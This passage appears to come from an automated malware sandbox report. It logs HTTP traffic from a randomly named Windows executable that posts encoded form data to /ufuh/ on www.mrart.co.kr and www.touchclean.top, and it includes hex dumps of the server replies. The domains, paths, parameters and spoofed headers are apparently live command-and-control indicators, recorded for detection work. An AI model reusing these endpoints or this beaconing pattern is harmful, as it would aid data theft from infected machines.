04 [TRUNCATED] Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r\| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z\|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT
Jun 3, 2024 08:53:38.587861061 CEST	212	IN	Data Raw: 31 73 47 63 18 fc 66 7b 0b c8 d3 4c df 97 0d 03 e8 0d 97 c7 0a 95 af 12 e0 d9 d9 b3 b3 dd 86 30 ac bd d4 79 37 e6 dc b3 ce dd ed 8d 1b c5 1c b2 e9 f8 b1 06 6e 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 Data Ascii: 1sGcf{L0y7ny{)&z\|:X`Q<FC7F_jPTGsoQ9xPx$#4!?\|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO
Jun 3, 2024 08:53:38.587878942 CEST	1236	IN	Data Raw: 1b b1 7e 84 be ff a9 50 94 f8 29 f0 10 b1 a7 0d de f8 69 c3 6c e9 86 6e 3c 6d 6c 59 c7 5b d6 53 b4 43 31 79 e8 a1 8f fa 1c 1f 8e 2e 87 0f 1a 72 6c f0 f7 81 40 08 df f0 39 98 46 36 d7 6f 30 36 90 38 6f 96 e2 e7 e8 25 69 3d 45 9b 74 7d db 9b 3a 48 Data Ascii: ~P)iln<mlY[SC1y.rl@9F6o068o%i=Et}:HyxAg!v@d"p:Mm\|E1\|_?=Xe;Y9k~KOC8{LHI!V?!4ItR^z`YN>
Jun 3, 2024 08:53:38.587896109 CEST	1236	IN	Data Raw: d6 10 2e 7d 42 4d c9 a1 ea a0 19 f0 af 56 13 59 8a ea 04 f6 14 1d 7f 5d 5d 90 b6 d4 31 5a 27 cf 9e ed 61 50 5e e4 af bb 71 72 82 a1 bb d3 df cc 43 7e 5e 14 43 42 80 d3 97 66 c7 f1 a6 c8 99 36 b9 f1 e0 33 ae 5a ba 93 11 30 a3 c5 13 08 fd 4f 54 82 Data Ascii: .}BMVY]]1Z'aP^qrC~^CBf63Z0OT99[=lc-SAeI{dR]*&4\|G\5aQf8pDG.QVr8CA0gz!1cf&/4@Nv"$.t\|j8uA hmn
Jun 3, 2024 08:53:38.587913990 CEST	1236	IN	Data Raw: 08 18 2b d0 db e0 2f 58 74 9a b6 44 ee 7b 3c c1 92 13 ce b4 32 12 ce a6 5c 3b 87 df 0e fc 38 89 28 8e fe 1b 13 51 15 8d eb 97 54 15 95 37 2e b0 54 1d 21 b3 4b 6a 85 f0 ea d2 33 c7 2b 17 0c a7 9e 57 af 03 4f c7 5a ba 5c 71 48 a3 9a 30 1b 9e ff c1 Data Ascii: +/XtD{<2\;8(QT7.T!Kj3+WOZ\qH0!r;o1<U+;>~i~hG-~p46'0qn4_APpO0e<g9}H?vG4Su\jZn/V"4"L[A.e>DG9wX]Yf&:[#_X
Jun 3, 2024 08:53:38.588037014 CEST	1236	IN	Data Raw: ce af 8f 11 97 d0 d0 ac 22 7e e1 86 1a 57 30 71 98 4b c3 53 2a 98 de e2 e9 f3 54 bb 6e 4e a8 eb 2b 7b fb 00 4a 92 20 1b dc dd 06 e5 82 e0 d7 ed b0 88 d3 9c d0 38 c1 c7 9c 2e f7 11 29 80 42 a2 00 fd d5 80 fa e0 72 14 d1 18 b9 cd 78 e4 60 4a 2a dd Data Ascii: "~W0qKSTnN+{J 8.)Brx`Jed#/@W~zgs!-f@Fgdr^PbM-4*\J:#[H4aRQ84a]\V]QB<G#'~D'-M}$uGA$ylAQ{k.@
Jun 3, 2024 08:53:38.588053942 CEST	646	IN	Data Raw: eb 78 ce b1 57 2c 2c 2d 40 50 c4 01 cb d6 2e 79 54 dd be d5 e5 91 77 b7 cd e3 6c 07 3f b7 bb 59 e0 ce bf 6c 53 08 dc 31 f2 fe e2 f7 af ff f6 8b 1f be f8 f2 fc e5 f7 e7 ff f4 f9 46 65 b8 9d 7d 2e 19 c1 d6 ff d5 11 14 f7 5e 8a 41 0c 16 0e 62 76 e9 Data Ascii: xW,,-@P.yTwl?YlS1Fe}.^AbvW0;P<MnbD+[eRZZI\;:/={?1>~o**IQkwB(fji1j9N+e0^Db\|>V^N+
Jun 3, 2024 08:53:38.588735104 CEST	20	IN	Data Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aLSd0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49181	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:39.912235022 CEST	719	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mrart.co.kr Origin: http://www.mrart.co.kr Referer: http://www.mrart.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 53 4d 77 71 72 69 6e 30 42 55 56 7a 44 6d 38 6f 73 71 61 56 59 4e 78 2b 53 77 69 77 79 46 35 68 58 30 70 6f 75 57 55 4b 78 6c 54 64 46 54 79 6e 36 7a 4b 6f 61 73 51 6f 68 70 48 61 69 52 4f 65 67 65 70 56 38 54 6b 44 58 62 6e 5a 31 77 75 46 4a 74 64 35 45 6a 46 38 6e 68 72 79 52 75 30 30 33 50 35 75 73 72 4d 63 48 46 73 34 63 66 30 6d 37 32 76 32 76 31 72 55 70 6c 6d 65 73 4a 2b 54 6b 54 57 66 53 42 52 5a 4a 48 41 2f 51 6e 49 6a 38 78 2b 66 4a 74 47 6c 2f 6e 64 65 36 6a 75 50 52 41 69 36 6c 39 68 2b 67 66 72 55 44 64 43 56 46 33 2b 4e 34 41 3d 3d Data Ascii: ZXdp=QFqMOSATDtFMSMwqrin0BUVzDm8osqaVYNx+SwiwyF5hX0pouWUKxlTdFTyn6zKoasQohpHaiROegepV8TkDXbnZ1wuFJtd5EjF8nhryRu003P5usrMcHFs4cf0m72v2v1rUplmesJ+TkTWfSBRZJHA/QnIj8x+fJtGl/nde6juPRAi6l9h+gfrUDdCVF3+N4A==
Jun 3, 2024 08:53:41.086045980 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding,Cookie Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 04 [TRUNCATED] Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r\| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z\|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT
Jun 3, 2024 08:53:41.086114883 CEST	1236	IN	Data Raw: 31 73 47 63 18 fc 66 7b 0b c8 d3 4c df 97 0d 03 e8 0d 97 c7 0a 95 af 12 e0 d9 d9 b3 b3 dd 86 30 ac bd d4 79 37 e6 dc b3 ce dd ed 8d 1b c5 1c b2 e9 f8 b1 06 6e 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 Data Ascii: 1sGcf{L0y7ny{)&z\|:X`Q<FC7F_jPTGsoQ9xPx$#4!?\|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO~P)iln<mlY[
Jun 3, 2024 08:53:41.086153030 CEST	1236	IN	Data Raw: 19 9a 37 02 0a 51 d4 2a fa 52 8b ea ea 29 a6 76 3d b0 00 14 b7 b0 82 4c fb 0b fb 3d 0c 5c 07 8c 3f f0 27 a2 4f 7d 59 87 ed 9a df 67 e9 c4 8e 0e 22 82 80 0a a8 40 37 60 aa 06 7d 95 86 10 41 87 b5 58 9d aa 21 c4 2c a2 5a 4f c6 cc 9f 31 0a f0 15 35 Data Ascii: 7QR)v=L=\?'O}Yg"@7`}AX!,ZO15nodzatg7@QuZ[/\BO7>o~!hcV3GQ0R ~7xo[8J.}BMVY]]1Z'
Jun 3, 2024 08:53:41.086188078 CEST	636	IN	Data Raw: 11 48 93 83 74 b6 96 80 b4 00 c4 5c 52 df c6 7a bd bd 04 a2 03 10 96 6e 2d 03 d9 02 90 a6 de ec 2e 01 e9 02 48 5b 37 3a 15 20 3c fc d4 34 c8 e5 a7 11 85 61 00 d1 f1 5f 88 4f 09 f7 e0 86 4a d2 7f ba 55 1e c5 ac b5 c3 58 08 3d c1 65 41 fe d1 36 2a Data Ascii: Ht\Rzn-.H[7: <4a_OJUX=eA6ZQXPjr0MP+Z3G4E r-zGc\'6qtDCT`F`LfGd<09wDjqI`3L#4;F*+/XtD{<2\;8
Jun 3, 2024 08:53:41.086221933 CEST	1236	IN	Data Raw: 7c d9 d5 09 ae ef c3 2e 43 eb 32 be eb 12 74 2e e1 b3 2e 41 e5 e2 be ea 12 44 2e ea a3 2e 4d 62 a1 6f 2a f7 a2 b4 2f 57 2c 1d 17 ee 50 de 6d ae a0 2b 6d f9 2c c7 bd 8e 1e 56 6c d5 5d 89 a5 75 08 ac 6b 8f 8b 36 f1 ae c6 e0 45 28 ad e6 b4 62 8f ef Data Ascii: \|.C2t..AD..Mbo/W,Pm+m,Vl]uk6E(b:@_c+Q2(]<4kZw%R3yew%2sW3V=w%\|{?;-^0X]hX;w]Kc<)6Cw_"tf x=}^VO\\
Jun 3, 2024 08:53:41.086252928 CEST	212	IN	Data Raw: 16 39 e1 e7 c2 24 24 9e 5b 20 c1 37 a7 34 cb 9c 69 c9 0b 49 51 8d b3 18 cf 59 0f f0 9b 54 21 8e 1b 6b 38 9b 48 a5 a8 35 64 06 f9 de 72 85 dc fb f9 c3 5f 3c 40 55 da 6d 78 2e 8f 69 ca fc 59 d7 c9 1f 60 5b ce 10 ca b3 db ba 35 30 51 c2 03 2b 95 30 Data Ascii: 9$$[ 74iIQYT!k8H5dr_<@Umx.iY`[50Q+0mb!~12`YIK*I7PTAJfR2?JJaA49bPn+1MJYt2L85%=jq
Jun 3, 2024 08:53:41.086287975 CEST	1236	IN	Data Raw: 0a 66 c8 d0 65 1e c4 14 22 e8 8c 25 94 62 2d a7 44 56 04 c6 82 4e 3c 1d 4c dc 04 e5 25 40 53 5e b9 f8 41 22 0d ec 96 70 2d ba d4 4f f0 28 a9 68 53 c0 54 82 c5 08 15 e5 92 77 d2 4b 01 4a e1 fd 65 a0 34 1a 12 95 22 d4 63 91 a8 63 be 43 82 21 91 21 Data Ascii: fe"%b-DVN<L%@S^A"p-O(hSTwKJe4"ccC!!!<\_`E@D\|Px)mWV%\|'S&i_;B1e_\@rSYep3r}$ ^(_kX=$U$UUW6<O
Jun 3, 2024 08:53:41.086324930 CEST	10	IN	Data Raw: 83 c8 ff 02 00 00 ff ff 0d 0a Data Ascii:
Jun 3, 2024 08:53:41.086894035 CEST	20	IN	Data Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aLSd0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49182	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:42.436942101 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mrart.co.kr Origin: http://www.mrart.co.kr Referer: http://www.mrart.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 54 74 41 71 70 46 54 30 55 45 56 79 49 47 38 6f 6d 4b 62 63 59 4e 4e 2b 53 78 6d 67 79 33 31 68 58 48 52 6f 74 77 67 4b 38 46 54 64 4f 7a 79 72 31 54 4c 7a 61 73 46 5a 68 73 6a 6b 69 58 65 65 68 39 52 56 36 52 38 45 50 62 6e 62 6b 41 75 47 4a 74 64 57 45 6a 56 34 6e 68 2f 63 52 75 38 30 33 35 4e 75 75 62 4d 66 4c 6c 73 34 63 66 31 70 37 32 76 7a 76 31 7a 79 70 6b 2f 46 73 2b 47 54 6b 78 65 66 65 47 6c 59 4c 48 41 37 4f 58 4a 79 38 77 58 51 46 76 32 74 78 47 30 39 38 53 44 70 56 54 75 2b 76 2b 5a 2f 67 2b 6e 50 63 70 6a 4c 46 6e 54 6f 72 74 47 6e 6a 69 79 34 38 71 7a 6a 56 5a 44 76 6b 45 38 34 36 70 6e 62 58 56 50 32 56 4c 55 56 36 79 4e 72 51 68 63 59 4c 41 58 70 62 59 53 59 54 50 43 77 56 77 63 35 30 54 32 48 71 59 33 4b 74 6c 4b 33 7a 34 59 31 38 62 75 31 6e 63 72 45 48 65 50 4c 54 68 39 63 50 6e 5a 6b 63 75 55 76 2f 39 6e 59 6c 74 4d 78 56 74 41 63 47 41 5a 62 35 74 67 74 5a 73 4a 72 58 74 69 45 70 4d 63 49 56 4e 4a 36 6a 58 33 41 71 34 52 4c 59 [TRUNCATED] Data Ascii: ZXdp=QFqMOSATDtFMTtAqpFT0UEVyIG8omKbcYNN+Sxmgy31hXHRotwgK8FTdOzyr1TLzasFZhsjkiXeeh9RV6R8EPbnbkAuGJtdWEjV4nh/cRu8035NuubMfLls4cf1p72vzv1zypk/Fs+GTkxefeGlYLHA7OXJy8wXQFv2txG098SDpVTu+v+Z/g+nPcpjLFnTortGnjiy48qzjVZDvkE846pnbXVP2VLUV6yNrQhcYLAXpbYSYTPCwVwc50T2HqY3KtlK3z4Y18bu1ncrEHePLTh9cPnZkcuUv/9nYltMxVtAcGAZb5tgtZsJrXtiEpMcIVNJ6jX3Aq4RLYzbaKx2vBw/CrC8SD83hLF0RUyFsGft+o8RITmH6J+HECm2ckrc/ayNNKiUMMphdU9ZqY2LMPmZ+qek2edrzZZ0MGm+HwCmXvq+qfd6vn3CBgo7dmUjM5k1VzFy7AP8E/ivnXVTOBgbhgFgLmHCIS4Pqx0PbxTQMgGtEq03VtR7YLjrKP/exlVw+rgPFmva0zNZCTpeam4KIWBhvzs/DKCQXDK1+9Jno+aokSku2qejmID26HT2nqgDq36AgzOCa0Tq9MOyW3IarkVDAdweJZl6AeoOegeuwJWPnKuTFpGLb7EaSi/iuzmfFDzqxEKcUQThCf7I+/Mp3raN157cD69AUn8V5dpOrBgdtK/Sd8rPTUfI4CsPAnHAq4ioovdNi08RDskpUOZ2XYNgr8+oS9vwTEbAhH3Lypdcaf19UxwaNdb6cS25pba1rTCfGtGQjCbpT0I6OuGkInhu1cUSjG68GRdv45vlie+OJtzW4fK4QztDGOaVO88ebt8KBdKFB9XMoxFM51Af/SLuY4jedme2mMSSExtEtKdL01TNm1cJNHruLya8zEYQ72nNJVgyOIIIoxldFPvtK6AfvCgz3OKuIQ+T6h1sS7JtYiiJWcvIF1iMjnFbtphuWFQQeXOQ88D7pmBlAs7A3o+cykBy+O7hn/YaceDUt5qn [TRUNCATED]
Jun 3, 2024 08:53:42.442013979 CEST	1672	OUT	Data Raw: 77 6d 4d 45 39 78 54 38 61 79 67 46 57 2b 31 41 30 2f 54 63 66 37 4f 39 30 31 33 38 51 72 54 39 54 6d 32 6b 54 59 65 44 53 6a 42 51 41 6f 45 64 75 79 33 6b 6c 6f 31 71 66 72 58 55 75 34 34 65 7a 44 70 58 71 37 73 48 49 69 66 75 56 47 4e 79 71 59 Data Ascii: wmME9xT8aygFW+1A0/Tcf7O90138QrT9Tm2kTYeDSjBQAoEduy3klo1qfrXUu44ezDpXq7sHIifuVGNyqYkTcxKPQLU5STwGERIDaw0LMrp7iIghQbBn/vrKVcCiCRFIxptHTZDcZDrV8TfXc9Jxq/4Cvks3W0yRewE89+H8w3VqyD9HTElqI5pkpAM4Mr3QLb7BRMiwIrjCAY/avvwfyxZ7VCoI5unheAKVcC7BGHpjYZ9eClw
Jun 3, 2024 08:53:43.639250040 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding,Cookie Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 04 [TRUNCATED] Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r\| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z\|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT
Jun 3, 2024 08:53:43.639273882 CEST	1236	IN	Data Raw: 31 73 47 63 18 fc 66 7b 0b c8 d3 4c df 97 0d 03 e8 0d 97 c7 0a 95 af 12 e0 d9 d9 b3 b3 dd 86 30 ac bd d4 79 37 e6 dc b3 ce dd ed 8d 1b c5 1c b2 e9 f8 b1 06 6e 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 Data Ascii: 1sGcf{L0y7ny{)&z\|:X`Q<FC7F_jPTGsoQ9xPx$#4!?\|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO~P)iln<mlY[
Jun 3, 2024 08:53:43.639288902 CEST	1236	IN	Data Raw: 19 9a 37 02 0a 51 d4 2a fa 52 8b ea ea 29 a6 76 3d b0 00 14 b7 b0 82 4c fb 0b fb 3d 0c 5c 07 8c 3f f0 27 a2 4f 7d 59 87 ed 9a df 67 e9 c4 8e 0e 22 82 80 0a a8 40 37 60 aa 06 7d 95 86 10 41 87 b5 58 9d aa 21 c4 2c a2 5a 4f c6 cc 9f 31 0a f0 15 35 Data Ascii: 7QR)v=L=\?'O}Yg"@7`}AX!,ZO15nodzatg7@QuZ[/\BO7>o~!hcV3GQ0R ~7xo[8J.}BMVY]]1Z'
Jun 3, 2024 08:53:43.639303923 CEST	636	IN	Data Raw: 11 48 93 83 74 b6 96 80 b4 00 c4 5c 52 df c6 7a bd bd 04 a2 03 10 96 6e 2d 03 d9 02 90 a6 de ec 2e 01 e9 02 48 5b 37 3a 15 20 3c fc d4 34 c8 e5 a7 11 85 61 00 d1 f1 5f 88 4f 09 f7 e0 86 4a d2 7f ba 55 1e c5 ac b5 c3 58 08 3d c1 65 41 fe d1 36 2a Data Ascii: Ht\Rzn-.H[7: <4a_OJUX=eA6ZQXPjr0MP+Z3G4E r-zGc\'6qtDCT`F`LfGd<09wDjqI`3L#4;F*+/XtD{<2\;8
Jun 3, 2024 08:53:43.639321089 CEST	1236	IN	Data Raw: 7c d9 d5 09 ae ef c3 2e 43 eb 32 be eb 12 74 2e e1 b3 2e 41 e5 e2 be ea 12 44 2e ea a3 2e 4d 62 a1 6f 2a f7 a2 b4 2f 57 2c 1d 17 ee 50 de 6d ae a0 2b 6d f9 2c c7 bd 8e 1e 56 6c d5 5d 89 a5 75 08 ac 6b 8f 8b 36 f1 ae c6 e0 45 28 ad e6 b4 62 8f ef Data Ascii: \|.C2t..AD..Mbo/W,Pm+m,Vl]uk6E(b:@_c+Q2(]<4kZw%R3yew%2sW3V=w%\|{?;-^0X]hX;w]Kc<)6Cw_"tf x=}^VO\\
Jun 3, 2024 08:53:43.639336109 CEST	212	IN	Data Raw: 16 39 e1 e7 c2 24 24 9e 5b 20 c1 37 a7 34 cb 9c 69 c9 0b 49 51 8d b3 18 cf 59 0f f0 9b 54 21 8e 1b 6b 38 9b 48 a5 a8 35 64 06 f9 de 72 85 dc fb f9 c3 5f 3c 40 55 da 6d 78 2e 8f 69 ca fc 59 d7 c9 1f 60 5b ce 10 ca b3 db ba 35 30 51 c2 03 2b 95 30 Data Ascii: 9$$[ 74iIQYT!k8H5dr_<@Umx.iY`[50Q+0mb!~12`YIK*I7PTAJfR2?JJaA49bPn+1MJYt2L85%=jq
Jun 3, 2024 08:53:43.639350891 CEST	1236	IN	Data Raw: 0a 66 c8 d0 65 1e c4 14 22 e8 8c 25 94 62 2d a7 44 56 04 c6 82 4e 3c 1d 4c dc 04 e5 25 40 53 5e b9 f8 41 22 0d ec 96 70 2d ba d4 4f f0 28 a9 68 53 c0 54 82 c5 08 15 e5 92 77 d2 4b 01 4a e1 fd 65 a0 34 1a 12 95 22 d4 63 91 a8 63 be 43 82 21 91 21 Data Ascii: fe"%b-DVN<L%@S^A"p-O(hSTwKJe4"ccC!!!<\_`E@D\|Px)mWV%\|'S&i_;B1e_\@rSYep3r}$ ^(_kX=$U$UUW6<O
Jun 3, 2024 08:53:43.639367104 CEST	10	IN	Data Raw: 83 c8 ff 02 00 00 ff ff 0d 0a Data Ascii:
Jun 3, 2024 08:53:43.639383078 CEST	20	IN	Data Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aLSd0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49183	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:44.963506937 CEST	460	OUT	GET /ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.mrart.co.kr User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:53:46.170798063 CEST	498	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 03 Jun 2024 06:53:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Vary: Accept-Encoding,Cookie Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://mrart.co.kr/ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&7jsp7=zz9xHbtX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49184	67.223.117.189	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:51.544153929 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.touchclean.top Origin: http://www.touchclean.top Referer: http://www.touchclean.top/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 4c 33 67 4f 52 46 57 43 64 35 35 4f 33 2f 35 73 4b 4e 6e 56 30 68 51 30 46 53 39 43 43 4c 64 69 37 52 33 78 49 47 50 35 54 70 55 67 63 49 64 53 33 55 5a 4f 33 64 47 65 71 59 61 72 6c 30 6e 77 4f 57 77 37 52 35 4d 50 35 54 59 73 43 57 6d 77 6f 66 4c 43 6f 4a 4d 37 6c 50 73 41 54 55 33 47 4a 30 4f 5a 6f 4d 7a 37 35 58 58 74 5a 30 38 38 75 33 73 38 78 55 32 34 57 64 71 4a 6a 47 37 62 79 64 63 47 65 52 6e 6e 72 46 6d 53 72 72 74 2b 41 2f 67 6b 4a 35 37 39 6f 7a 75 2b 4f 66 71 74 47 2b 75 47 65 59 35 45 73 30 5a 44 61 42 44 30 